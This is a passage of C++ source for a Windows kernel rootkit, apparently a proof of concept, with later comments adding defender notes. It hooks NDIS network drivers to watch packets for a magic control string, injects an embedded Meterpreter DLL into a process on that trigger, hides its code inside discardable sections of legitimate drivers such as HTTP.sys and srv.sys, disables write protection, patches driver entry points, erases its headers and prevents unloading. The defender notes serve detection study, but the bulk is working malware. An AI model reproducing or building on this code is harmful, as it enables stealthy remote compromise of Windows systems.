OldHandlerContext; HookStruct->op4_0x50 = 0x50; HookStruct->op5_0x68 = 0x68; HookStruct->Handler = Handler; HookStruct->op6_0xc3 = 0xc3; } return HookStruct; } #endif // _X86_ //-------------------------------------------------------------------------------------- #define JUMP_SIZE 6 PVOID NdisHookAllocJump(PVOID Address, PVOID Destination) { PVOID Image = NULL; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation); if (Info) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { // find image by address inside it if (Address > Info->Modules[i].ImageBase && Address < (PUCHAR)Info->Modules[i].ImageBase + Info->Modules[i].ImageSize) { Image = Info->Modules[i].ImageBase; break; } } ExFreePool(Info); } if (Image == NULL) { // unknown address return Destination; } PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) (pHeaders->FileHeader.SizeOfOptionalHeader + (PUCHAR)&pHeaders->OptionalHeader); UCHAR ZeroBytes[JUMP_SIZE]; RtlZeroMemory(ZeroBytes, sizeof(ZeroBytes)); // find the '.text' section for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++, pSection++) { if (!strcmp((char *)&pSection->Name, ".text") && (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) && !(pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)) { // calculate the real size of section ULONG RealSize = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment); ULONG PaddingSize = RealSize - pSection->Misc.VirtualSize; if (PaddingSize > JUMP_SIZE) { // find section padding PUCHAR Padding = RVATOVA(Image, pSection->VirtualAddress + pSection->Misc.VirtualSize); for (ULONG p = PaddingSize - JUMP_SIZE; p != 0; p--) { PUCHAR Ptr = Padding + p; // check for zero bytes if (RtlCompareMemory(Ptr, ZeroBytes, JUMP_SIZE) == JUMP_SIZE) { ClearWp(); #ifdef _X86_ // allocate jump *(Ptr + 0) = 0x68; /* PUSH Destination */ 
*(PVOID *)(Ptr + 1) = Destination; *(Ptr + 1 + sizeof(PVOID)) = 0xc3; /* RET */ #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ SetWp(); return Ptr; } } } } } return Destination; } //-------------------------------------------------------------------------------------- typedef void (NTAPI * func_IndicateNetBufferListsHandler)( NDIS_HANDLE MiniportAdapterHandle, PNET_BUFFER_LIST NetBufferLists, NDIS_PORT_NUMBER PortNumber, ULONG NumberOfNetBufferLists, ULONG ReceiveFlags ); void IndicateNetBufferListsHandler( /***/ PVOID Reserved, func_IndicateNetBufferListsHandler OldHandler, /***/ NDIS_HANDLE MiniportAdapterHandle, PNET_BUFFER_LIST NetBufferLists, NDIS_PORT_NUMBER PortNumber, ULONG NumberOfNetBufferLists, ULONG ReceiveFlags) { // iterate NET_BUFFER_LIST PNET_BUFFER_LIST BufferList = NetBufferLists; while (BufferList) { PVOID Buff = NULL; ULONG BuffSize = 0; // get raw buffers data if (CopyNBLToBuffer(BufferList, &Buff, &BuffSize) == NDIS_STATUS_SUCCESS) { #ifdef DBG_NDIS_HOOK DbgMsg(__FUNCTION__"(): Miniport = "IFMT", Length = %d\n", MiniportAdapterHandle, BuffSize); #endif if (m_Handler) { // call the data handler m_Handler(MiniportAdapterHandle, Buff, BuffSize); } ExFreePool(Buff); } BufferList = NET_BUFFER_LIST_NEXT_NBL(BufferList); } // call original function OldHandler( MiniportAdapterHandle, NetBufferLists, PortNumber, NumberOfNetBufferLists, ReceiveFlags ); } typedef void (NTAPI * func_MiniportInterruptDPC)( NDIS_HANDLE MiniportInterruptContext, PVOID MiniportDpcContext, PVOID ReceiveThrottleParameters, PVOID NdisReserved2 ); void MiniportInterruptDPC( /***/ PVOID Miniport, func_MiniportInterruptDPC OldHandler, /***/ NDIS_HANDLE MiniportInterruptContext, PVOID MiniportDpcContext, PVOID ReceiveThrottleParameters, PVOID NdisReserved2) { PVOID Handler = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler); #ifdef DBG_NDIS_HOOK DbgMsg(__FUNCTION__"(): Miniport = "IFMT"\n", Miniport); #endif // allocate trampoline for 
hook handler calling PVOID HookStruct = NdisHookAlloc(Handler, NULL, IndicateNetBufferListsHandler); if (HookStruct) { // hook _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = HookStruct; } // call original function OldHandler( MiniportInterruptContext, MiniportDpcContext, ReceiveThrottleParameters, NdisReserved2 ); if (HookStruct) { // restore _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = Handler; ExFreePool(HookStruct); } } //-------------------------------------------------------------------------------------- ULONG NdisHookSet(PUCHAR PointerFixup) { #ifdef USE_PARANOID_CHEKS if (NDIS_MINIPORT_BLOCK_InterruptEx < 0 || NDIS_INTERRUPT_BLOCK_MiniportDpc < 0 || NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return 0; } #endif // USE_PARANOID_CHEKS ULONG Hooked = 0; NDIS_HANDLE hBogusProtocol = BogusProtocolRegister(); if (hBogusProtocol) { UNICODE_STRING usTcpIp; RtlInitUnicodeString(&usTcpIp, L"TCPIP"); // lookup the 'TCPIP' protocol PVOID Protocol = NdisHookProtocolFind(hBogusProtocol, &usTcpIp); if (Protocol) { DbgMsg(__FUNCTION__"(): \"TCPIP\" protocol address is "IFMT"\n", Protocol); // enumerate open miniports PVOID OpenBlock = NULL; while (OpenBlock = NdisHookProtocolEnumOpened(Protocol, OpenBlock)) { // get miniport address PVOID Miniport = NdisHookOpenGetMiniport(OpenBlock); if (Miniport) { DbgMsg(__FUNCTION__"(): Open block = "IFMT", Miniport = "IFMT"\n", OpenBlock, Miniport); // get _NDIS_INTERRUPT_BLOCK address PVOID InterruptEx = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_InterruptEx); if (InterruptEx == NULL) { continue; } // change _NDIS_INTERRUPT_BLOCK::MiniportDpc routine address PVOID MiniportDpc = *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc); if (MiniportDpc == NULL) { 
continue; } // allocate trampoline for hook handler calling PVOID HookStruct = NdisHookAlloc(MiniportDpc, Miniport, RECALCULATE_POINTER(MiniportInterruptDPC)); if (HookStruct) { // hook _NDIS_INTERRUPT_BLOCK::MiniportDpc *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc) = NdisHookAllocJump(MiniportDpc, HookStruct); DbgMsg(__FUNCTION__"(): Hooking MiniportDpc: "IFMT" -> "IFMT"\n", MiniportDpc, HookStruct); Hooked += 1; } } } } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find \"TCPIP\" protocol\n"); } BogusProtocolUnregister(); } return Hooked; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/ndis_hook.h ================================================ typedef void (NTAPI * NDIS_HOOK_BUFFER_HANDLER)(PVOID MiniportHandle, PVOID Buffer, ULONG Size); extern "C" { BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler); PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol); PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock); PVOID NdisHookOpenGetMiniport(PVOID OpenBlock); PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler); PVOID NdisHookAllocJump(PVOID Address, PVOID Destination); ULONG NdisHookSet(PUCHAR PointerFixup); }; ================================================ FILE: src/rootkit_driver/network.cpp ================================================ #include "stdafx.h" //-------------------------------------------------------------------------------------- SHORT ChecksumEnd(ULONG Sum) { Sum = (Sum >> 16) + (Sum & 0xffff); Sum += (Sum >> 16); return (USHORT)(~Sum); } /* * Calculate checksum of a buffer. * @param Data Pointer to buffer with data. * @param Count Number of bytes in buffer. * @param Seed Previously calculated checksum (if any). * @return Checksum of buffer. 
*/ ULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed) { register ULONG Sum = Seed; while (Count > 1) { Sum += *(PUSHORT)Data; Count -= 2; Data = (PVOID)((PUCHAR)Data + 2); } /* Add left-over byte, if any */ if (Count > 0) { Sum += *(PUCHAR)Data; } return Sum; } USHORT Checksum(PVOID Data, int Count) { ULONG Sum = ChecksumCompute(Data, Count, 0); return ChecksumEnd(Sum); } //-------------------------------------------------------------------------------------- char *inet_ntoa(ULONG Addr) { static char buff[4 * sizeof("123")]; PUCHAR ucp = (PUCHAR)&Addr; sprintf(buff, "%d.%d.%d.%d", ucp[0] & 0xff, ucp[1] & 0xff, ucp[2] & 0xff, ucp[3] & 0xff); return buff; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/network.h ================================================ #define NET_MAC_ADDR_LEN 6 #include typedef struct _NET_ETH_HEADER { UCHAR Dst[NET_MAC_ADDR_LEN]; UCHAR Src[NET_MAC_ADDR_LEN]; USHORT Type; } NET_ETH_HEADER, *PNET_ETH_HEADER; #include #define ETH_P_IP 0x0800 /* Internet Protocol packet */ #define ETH_P_ARP 0x0806 /* Address Resolution packet */ #define ETH_IS_BCAST_ADDR(Addr) \ \ (((Addr)[0] == 0xff) && ((Addr)[1] == 0xff) && \ ((Addr)[2] == 0xff) && ((Addr)[3] == 0xff) && \ ((Addr)[4] == 0xff) && ((Addr)[5] == 0xff)) #define ETH_MATCH_ADDR(Addr1, Addr2) \ \ (((Addr1)[0] == (Addr2)[0]) && ((Addr1)[1] == (Addr2)[1]) && \ ((Addr1)[2] == (Addr2)[2]) && ((Addr1)[3] == (Addr2)[3]) && \ ((Addr1)[4] == (Addr2)[4]) && ((Addr1)[5] == (Addr2)[5])) /* Standard well-defined IP protocols. 
*/ enum { IPPROTO_IP = 0, /* Dummy protocol for TCP */ IPPROTO_ICMP = 1, /* Internet Control Message Protocol */ IPPROTO_IGMP = 2, /* Internet Group Management Protocol */ IPPROTO_TCP = 6, /* Transmission Control Protocol */ IPPROTO_UDP = 17, /* User Datagram Protocol */ IPPROTO_SCTP = 132, /* Stream Control Transport Protocol */ IPPROTO_RAW = 255, /* Raw IP packets */ }; #include typedef struct _NET_IPv4_HEADER { UCHAR HeaderLength:4, Version:4; UCHAR TypeOfService; USHORT TotalLength; USHORT Id; USHORT FragmentOffset; UCHAR TimeToLive; UCHAR Protocol; USHORT Checksum; ULONG Src; ULONG Dst; } NET_IPv4_HEADER, *PNET_IPv4_HEADER; #include // unsigned long to TCP/IP network byte order #define HTONL(_a_) \ \ ((((_a_) & 0x000000FF) << 24) + \ (((_a_) & 0x0000FF00) << 8) + \ (((_a_) & 0x00FF0000) >> 8) + \ (((_a_) & 0xFF000000) >> 24)) // unsigned short to TCP/IP network byte order #define HTONS(_a_) \ \ (((0x00FF & (_a_)) << 8) + \ ((0xFF00 & (_a_)) >> 8)) SHORT ChecksumEnd(ULONG Sum); ULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed); USHORT Checksum(PVOID Data, int Count); char *inet_ntoa(ULONG Addr); ================================================ FILE: src/rootkit_driver/post_build.bat ================================================ @echo off if exist ..\rootkit_driver_debug.sys ..\bin2c.exe ..\rootkit_driver_debug.sys rootkit_driver > ..\includes\rootkit_driver_debug.sys.h if exist ..\rootkit_driver.sys ..\bin2c.exe ..\rootkit_driver.sys rootkit_driver > ..\includes\rootkit_driver.sys.h pause ================================================ FILE: src/rootkit_driver/rootkit_driver.cpp ================================================ #include "stdafx.h" #pragma comment(linker,"/MERGE:.rdata=.text") #pragma comment(linker,"/MERGE:.edata=.text") #pragma section("INIT",read,write,execute) extern "C" { NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath); void HookImageEntry(PVOID Image); BOOLEAN CheckForFreeArea(PVOID Image, 
PULONG FreeAreaRVA, PULONG FreeAreaLength); VOID LoadImageNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId, PIMAGE_INFO ImageInfo); VOID DriverEntryInitializePayload(PUCHAR PointerFixup); }; #pragma alloc_text(INIT, ClearWp) #pragma alloc_text(INIT, SetWp) #pragma alloc_text(INIT, NewDriverEntry) #pragma alloc_text(INIT, HookImageEntry) #pragma alloc_text(INIT, CheckForFreeArea) #pragma alloc_text(INIT, LoadImageNotify) #pragma alloc_text(INIT, DriverEntryInitializePayload) // user-mode DLL file #ifdef DBGMSG __declspec(allocate("INIT")) #include "../includes/meterpreter_debug.dll.h" #else __declspec(allocate("INIT")) #include "../includes/meterpreter.dll.h" #endif // defined in runtime.cpp extern PVOID m_DriverBase; ULONG m_DriverSize = 0; BOOLEAN m_bDriverMustBeFreed = FALSE; ULONG m_RkOffset = 0, m_RkSize = 0; PVOID m_FreeAreaFound = NULL; #define EP_PATCH_SIZE 6 UCHAR m_EpOriginalBytes[EP_PATCH_SIZE]; DRIVER_INITIALIZE *m_HookedEntry = NULL; PVOID m_Payload = NULL; ULONG m_PayloadSize = 0; //-------------------------------------------------------------------------------------- VOID InjectPayloadThread(PVOID Param) { if (m_Payload && m_PayloadSize > 0) { // inject user mode payload into the process InjectIntoProcessByName(METERPRETER_PROCESS, m_Payload, m_PayloadSize); } } //-------------------------------------------------------------------------------------- void NTAPI NdisHookHandleBuffer(PVOID MiniportHandle, PVOID Buffer, ULONG Size) { if (Size < sizeof(NET_ETH_HEADER) + sizeof(NET_IPv4_HEADER)) { // buffer is too small return; } // check the ethernet header PNET_ETH_HEADER Eth = (PNET_ETH_HEADER)Buffer; if (Eth->Type != HTONS(ETH_P_IP)) { // not a internet protocl packet return; } // check the IP header PNET_IPv4_HEADER Ip = (PNET_IPv4_HEADER)((PUCHAR)Eth + sizeof(NET_ETH_HEADER)); if (Ip->Version != 4 || Ip->HeaderLength * 4 != sizeof(NET_IPv4_HEADER)) { // not a IPv4 packet return; } if (Ip->Protocol != IPPROTO_ICMP && Ip->Protocol != IPPROTO_IP && 
Ip->Protocol != IPPROTO_UDP) { // unknown protocol return; } if (HTONS(Ip->TotalLength) + sizeof(NET_ETH_HEADER) > Size) { // total length out of bounds return; } // remember and reset checksum USHORT Sum = Ip->Checksum; Ip->Checksum = 0; // validate checksum if (Sum != Checksum(Ip, sizeof(NET_IPv4_HEADER))) { return; } char Dst[16], Src[16]; strcpy(Dst, inet_ntoa(Ip->Dst)); strcpy(Src, inet_ntoa(Ip->Src)); DbgMsg( __FUNCTION__"() IP: From = %s, To = %s, Protocol = %d, Length = %d\n", Src, Dst, Ip->Protocol, HTONS(Ip->TotalLength) ); // find magic sequence in packet char *lpszMagic = "RKCTL:" ROOTKIT_CTL_KEY; for (ULONG i = 0; i < Size - strlen(lpszMagic); i++) { if (RtlCompareMemory((PUCHAR)Buffer + i, lpszMagic, strlen(lpszMagic)) == strlen(lpszMagic)) { DbgMsg(__FUNCTION__"(): Magic sequence has been find in network packet!\n"); // we are at DPC level: create thread for execution of process injection code HANDLE hThread = NULL; NTSTATUS ns = PsCreateSystemThread( &hThread, THREAD_ALL_ACCESS, NULL, NULL, NULL, InjectPayloadThread, NULL ); if (NT_SUCCESS(ns)) { ZwClose(hThread); } else { DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns); } break; } } } //-------------------------------------------------------------------------------------- VOID DriverEntryContinueThread(PVOID Param) { /** * Hidden rootkit code starts execution here. 
*/ LARGE_INTEGER Timeout = { 0 }; Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3)); DbgPrint(__FUNCTION__"(): Param = "IFMT"\n", Param); // initialize NDIS hook data handler NdisHookInitialize(NdisHookHandleBuffer); // initialize DLL injector InjectInitialize(); KeDelayExecutionThread(KernelMode, FALSE, &Timeout); if (Param) { // free memory, that has been allocated for driver ExFreePool(Param); } #ifndef USE_STEALTH_IMAGE if (m_DriverBase) { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) ((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew); // erase image headers RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders); } #endif // USE_STEALTH_IMAGE #ifdef USE_GREETING_MESSAGE while (true) { DbgPrint(__FUNCTION__"(): Commertial malware rootkits are sucks!\n"); // sleep KeDelayExecutionThread(KernelMode, FALSE, &Timeout); } #endif // USE_GREETING_MESSAGE } //-------------------------------------------------------------------------------------- void DriverEntryInitializePayload(PUCHAR PointerFixup) { /* Perform payload initialization here */ NdisHookSet(PointerFixup); // allocate memory for payload in non-paged pool ULONG PayloadSize = sizeof(dll); PVOID Payload = ExAllocatePool(NonPagedPool, PayloadSize); if (Payload) { RtlCopyMemory(Payload, dll, sizeof(dll)); PULONG pPayloadSize = (PULONG)RECALCULATE_POINTER(&m_PayloadSize); PVOID *pPayload = (PVOID *)RECALCULATE_POINTER(&m_Payload); *pPayloadSize = PayloadSize; *pPayload = Payload; } else { DbgMsg("ExAllocatePool() fails\n"); } } //-------------------------------------------------------------------------------------- #ifdef _X86_ //-------------------------------------------------------------------------------------- void ClearWp(void) { // allow to execute the code only on the 1-st CPU KeSetSystemAffinityThread(0x00000001); __asm { mov eax, cr0 and eax, not 000010000h mov cr0, eax } } void SetWp(void) { __asm { mov eax, cr0 or eax, 000010000h mov cr0, eax } } 
//--------------------------------------------------------------------------------------
#endif // _X86_
//--------------------------------------------------------------------------------------
/*
    Translates a pointer into the originally loaded image into the matching
    address inside the relocated copy.

    Ptr          - address inside the image based at m_DriverBase.
    PointerFixup - value added after the image-relative offset is computed
                   (callers pass m_FreeAreaFound - m_RkOffset).

    Returns Ptr unchanged when USE_STEALTH_IMAGE is not defined or when
    m_DriverBase is NULL.
*/
PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup)
{
#ifdef USE_STEALTH_IMAGE

    if (m_DriverBase == NULL)
    {
        return Ptr;
    }

    return (PUCHAR)Ptr - (PUCHAR)m_DriverBase + PointerFixup;

#else // USE_STEALTH_IMAGE

    return Ptr;

#endif //USE_STEALTH_IMAGE
}
//--------------------------------------------------------------------------------------
/*
    Replacement entry point that runs in place of the hooked driver's own
    entry point (see HookImageEntry).

    Sequence visible in this routine:
      1. Restore the saved entry-point bytes and call the original entry point.
      2. Remove the load-image notify routine; when the removal succeeds the
         original image is marked to be freed later.
      3. If the original entry point succeeded: make a pool copy of this image,
         relocate it for its new base, copy m_RkSize bytes starting at
         m_RkOffset into the free area of the host driver, stage the payload
         and start a system thread at the relocated DriverEntryContinueThread.
      4. Clear DriverObject->DriverUnload so that the host driver cannot be
         unloaded.

    Returns the status of the original entry point, except that `ns` is
    overwritten by the PsCreateSystemThread() status once the copy has been
    made, so a thread-creation failure is reported as a host driver failure.

    Defender notes: after this runs, executable code is located inside the
    address range of a legitimate driver, in sections that were marked
    discardable. Artifacts that follow from the visible code are a mismatch
    between the in-memory image and the on-disk file of the drivers listed in
    m_Images, section headers with the discardable flag cleared, a NULL
    DriverUnload on the host driver object, and a system thread whose start
    address falls into that range.
*/
NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    // disable memory write protection
    ClearWp();

    // restore original code from image entry point
    memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);

    // enable memory write protection
    SetWp();

    NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);

    DbgMsg(__FUNCTION__"(): Hooked driver returns 0x%.8x\n", ns);

    if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)
    {
        m_bDriverMustBeFreed = TRUE;
    }

    if (NT_SUCCESS(ns))
    {
        PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);
        if (Image)
        {
            // prepare rootkit code for injection into the discardable sections
            memcpy(Image, m_DriverBase, m_DriverSize);
            // the return value of RuntimeProcessRelocs() is not checked here
            RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));

            // disable memory write protection
            ClearWp();

            memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);

            // enable memory write protection
            SetWp();

            PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;

            // set up NDIS hooks
            DriverEntryInitializePayload(PointerFixup);

            PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);

            DbgMsg(__FUNCTION__"(): Start address: "IFMT"\n", Start);

            // create thread for execution copied code
            HANDLE hThread = NULL;
            ns = PsCreateSystemThread(
                &hThread,
                THREAD_ALL_ACCESS,
                NULL, NULL, NULL,
                Start,
                m_bDriverMustBeFreed ? m_DriverBase : NULL
            );
            if (NT_SUCCESS(ns))
            {
                ZwClose(hThread);
            }
            else
            {
                DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
            }

            // only the temporary relocated copy is released here
            ExFreePool(Image);
        }

        // don't allow to unload target driver
        DriverObject->DriverUnload = NULL;
    }

    return ns;
}
//--------------------------------------------------------------------------------------
/*
    Redirects the entry point of a freshly mapped driver image to NewDriverEntry.

    Image - base address of the mapped image; its headers are parsed as a
            32-bit PE.

    EP_PATCH_SIZE bytes at the entry point are saved in m_EpOriginalBytes, then
    six bytes are written: 0x68 <address of NewDriverEntry> 0xC3, which is
    `push imm32` followed by `ret`. x86 only; other targets fail at compile time.

    Defender note: between image load and the call of its entry point, the
    first bytes at AddressOfEntryPoint differ from the on-disk file.
    NewDriverEntry() restores them before calling the original code, so the
    patch is only present for that window.
*/
void HookImageEntry(PVOID Image)
{
    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)
        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);

    PUCHAR Entry = (PUCHAR)RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint);

    // save original code from image entry point
    memcpy(m_EpOriginalBytes, Entry, EP_PATCH_SIZE);
    m_HookedEntry = (DRIVER_INITIALIZE *)Entry;

    // disable memory write protection
    ClearWp();

#ifdef _X86_

    // patch image entry point
    *(PUCHAR)(Entry + 0) = 0x68;
    *(PVOID*)(Entry + 1) = NewDriverEntry;
    *(PUCHAR)(Entry + 5) = 0xC3;

#else // _X86_

#error __FUNCTION__ is x86 only

#endif // _X86_

    // enable memory write protection
    SetWp();

    DbgMsg(
        __FUNCTION__"(): Image entry point hooked ("IFMT" -> "IFMT")\n",
        Entry, NewDriverEntry
    );
}
//--------------------------------------------------------------------------------------
/*
    Looks for a run of adjacent discardable sections in Image that is large
    enough to hold m_RkSize bytes.

    Image          - base address of the mapped image (parsed as 32-bit PE).
    FreeAreaRVA    - receives the RVA of the run, 0 when nothing was found.
    FreeAreaLength - receives the length of the run, aligned up to
                     SectionAlignment, 0 when nothing was found.

    Returns TRUE when the run is large enough. In that case the
    IMAGE_SCN_MEM_DISCARDABLE flag is cleared in every section header of the
    image. Only the most recent run is kept: a discardable section that does
    not directly follow the current run starts a new one.

    NOTE(review): szSectionName is declared but never filled from
    pSection->Name in the visible code, so the "INIT" comparison reads an
    uninitialized buffer and its result cannot be relied on when analysing
    which sections get selected.

    Defender note: the cleared discardable flags are written into the
    in-memory section table of the host driver, which makes a comparison of
    the in-memory section headers with the on-disk file a direct check.
*/
BOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength)
{
    *FreeAreaRVA = NULL;
    *FreeAreaLength = 0;

    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)
        ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);

    // the section table follows the optional header
    PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)
        (pHeaders->FileHeader.SizeOfOptionalHeader +
        (PUCHAR)&pHeaders->OptionalHeader);

    ULONG AreaRVA = NULL;
    ULONG AreaLength = 0;

    // enumerate image sections
    for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
    {
        PVOID SectionVa = RVATOVA(Image, pSection->VirtualAddress);
        char szSectionName[IMAGE_SIZEOF_SHORT_NAME + 1];

        // check for discardable attribute
        // (my_strcmp() returns non-zero when the strings differ)
        if ((pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) &&
            my_strcmp(szSectionName, "INIT"))
        {
            if (AreaRVA && pSection->VirtualAddress == AreaRVA + AreaLength)
            {
                // concatenate with the previously found section
                AreaLength += MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);
            }
            else
            {
                AreaRVA = pSection->VirtualAddress;
                AreaLength = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);
            }
        }

        pSection += 1;
    }

    if (AreaLength >= m_RkSize)
    {
        DbgMsg("%d free bytes at 0x%.8x\n", AreaLength, AreaRVA);

        *FreeAreaRVA = AreaRVA;
        *FreeAreaLength = AreaLength;

        pSection = (PIMAGE_SECTION_HEADER)
            (pHeaders->FileHeader.SizeOfOptionalHeader +
            (PUCHAR)&pHeaders->OptionalHeader);

        // erase discardable flag
        for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
        {
            pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;
            pSection += 1;
        }

        return TRUE;
    }

    return FALSE;
}
//--------------------------------------------------------------------------------------
/*
    kd> kb
    ChildEBP RetAddr  Args to Child
    f8afdaa8 805c62ae f8afdcf0 00000000 f8afdb44 DrvHide!LoadImageNotify+0x10
    f8afdac8 805a4159 f8afdcf0 00000000 f8afdb44 nt!PsCallImageNotifyRoutines+0x36
    f8afdc6c 80576483 f8afdcf0 00000000 00000000 nt!MmLoadSystemImage+0x9e5
    f8afdd4c 8057688f 80000378 00000001 00000000 nt!IopLoadDriver+0x371
    f8afdd74 80534c02 80000378 00000000 823c63c8 nt!IopLoadUnloadDriver+0x45
    f8afddac 805c6160 b286ecf4 00000000 00000000 nt!ExpWorkerThread+0x100
    f8afdddc 80541dd2 80534b02 00000001 00000000 nt!PspSystemThreadStartup+0x34
    00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16
*/

// images for storing malicious code
// Defender note: these are the driver file names whose in-memory images
// should be compared against the on-disk files when this PoC is suspected.
PWSTR m_Images[] =
{
    L"\\HTTP.sys",
    L"\\mrxsmb.sys",
    L"\\mrxsmb10.sys",
    L"\\mrxsmb20.sys",
    L"\\srv.sys",
    L"\\srv2.sys",
    L"\\secdrv.sys"
};

/*
    Load-image notify routine; selects the first suitable driver from m_Images
    as the host for the relocated code.

    FullImageName - path of the image being loaded.
    ProcessId     - process the image is mapped into; 0 is required here.
    ImageInfo     - image base, size and the SystemModeImage flag.

    Does nothing once m_FreeAreaFound is set. The name check is a
    case-insensitive comparison done with EqualUnicodeString_r(), which
    compares the strings from their ends. On a match with enough discardable
    space the entry point of the image is hooked.
*/
VOID LoadImageNotify(
    PUNICODE_STRING FullImageName,
    HANDLE ProcessId, // where image is mapped
    PIMAGE_INFO ImageInfo)
{
    if (m_FreeAreaFound)
    {
        return;
    }

    // check for kernel driver
    if (ProcessId == 0 && ImageInfo->SystemModeImage)
    {
        BOOLEAN bImageFound = FALSE;
        PVOID TargetImageBase = ImageInfo->ImageBase;
        ULONG TargetImageSize = ImageInfo->ImageSize;

        DbgMsg(
            __FUNCTION__"(): '%wZ' is at "IFMT", size=%d\n",
            FullImageName, TargetImageBase, TargetImageSize
        );

        // check for the known image
        for (ULONG i = 0; i < sizeof(m_Images) / sizeof(PWSTR); i++)
        {
            UNICODE_STRING usName;
            RtlInitUnicodeString(&usName, m_Images[i]);

            if (EqualUnicodeString_r(FullImageName, &usName, TRUE))
            {
                bImageFound = TRUE;
                break;
            }
        }

        if (bImageFound)
        {
            // check for the free space in image discardable sections
            ULONG FreeAreaRVA = 0, FreeAreaLength = 0;
            if (CheckForFreeArea(TargetImageBase, &FreeAreaRVA, &FreeAreaLength))
            {
                // copy malicious code into this image
                // (the copy itself is done later, in NewDriverEntry(); here
                // only the destination is recorded and the entry point hooked)
                m_FreeAreaFound = RVATOVA(TargetImageBase, FreeAreaRVA);

                HookImageEntry(TargetImageBase);
            }
        }
    }
}
//--------------------------------------------------------------------------------------
/*
    Driver entry point.

    RuntimeInitialize() runs first; per its own comments it also handles the
    case where the image was loaded by shellcode (DriverObject == NULL and
    RegistryPath carrying loader parameters).

    With USE_STEALTH_IMAGE: walks the own section table, records the first
    section RVA in m_RkOffset, clears the discardable flag on own discardable
    sections, sums the aligned sizes of the remaining sections into m_RkSize,
    stores the current base in OptionalHeader.ImageBase for later relocation
    processing, and registers LoadImageNotify. Nothing else happens until a
    driver from m_Images is loaded.

    Without USE_STEALTH_IMAGE: stages the payload and starts
    DriverEntryContinueThread directly.

    Returns STATUS_UNSUCCESSFUL when runtime initialization fails (or, in the
    stealth build, when m_DriverBase is NULL), otherwise STATUS_SUCCESS even
    when the notify registration or the thread creation failed.

    Defender note: while the stealth build waits for a host driver, the
    registered load-image notify routine points into this image and is
    visible to kernel inspection that enumerates notify callbacks.
*/
NTSTATUS NTAPI DriverEntry(
    PDRIVER_OBJECT  DriverObject,
    PUNICODE_STRING RegistryPath)
{
    if (!RuntimeInitialize(DriverObject, RegistryPath))
    {
        return STATUS_UNSUCCESSFUL;
    }

